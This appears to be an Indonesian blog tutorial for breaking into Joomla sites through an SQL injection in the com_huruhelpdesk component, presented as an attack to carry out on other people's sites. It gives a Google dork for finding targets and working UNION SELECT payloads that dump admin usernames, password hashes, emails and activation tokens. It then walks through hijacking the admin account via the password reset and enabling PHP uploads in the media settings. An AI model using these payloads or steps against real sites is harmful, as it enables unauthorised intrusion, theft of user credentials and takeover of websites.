Home > > SQL injections “Joomla”

SQL injections “Joomla”

Bagikan ke Teman! :

==========
[+] step 1
==========
Silahkan ke sini:

http://www.exploit-db.com/

Kalo dah dapet
tes satu per satu
coba kita ambil yang ini: "inurl:/index.php?option=com_huruhelpdesk"
buka google.. ketik keyword
"inurl:/index.php?option=com_huruhelpdesk"

==========
[+] step 2
==========
pasang exploit..

/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7+from+jos_users--

contoh : http://sitetarge.com/

index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7+from+jos_users--

biar lebih jelas ss nya dech

tu admin nya… nampak.. :P
==========
[+] step 3
==========
coba kita reset password nya
/index.php?option=com_user&view=reset
hm.. minta email dia.. masukin aj email admin tadi..

enter..
==========
[+] step 4
==========
minta activation pula
hmm.. gimana ne?
tenang.. kita cari dulu activationnya

/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email,0x3a,activation),5,6,7+from+jos_users--

tu kluar activatifasinya
hehehe

==========
[+] step 5
==========
copas aja ke yang tadi.. enter..

==========
[+] step 6
==========
wkwkkw
minta pasword baru tu.. kasih aja..
hehhehe

==========
[+] step 7
==========
OK langsung aja masuk ke admin nya..

contoh : http://sitetarget.com/administrator

wkekwekwke
==========
[+] step 8
==========
masuk ternyata.. heheh
sabar²..

nah.. di sini ente harus ubah dulu “Global configuration” nya
lalu setelah itu masuk ke “media manager”
==========
[+] step 9
==========
nah.. kita ke gloal configuration terlebih dahulu
ubah media settingnya, tambahin aja php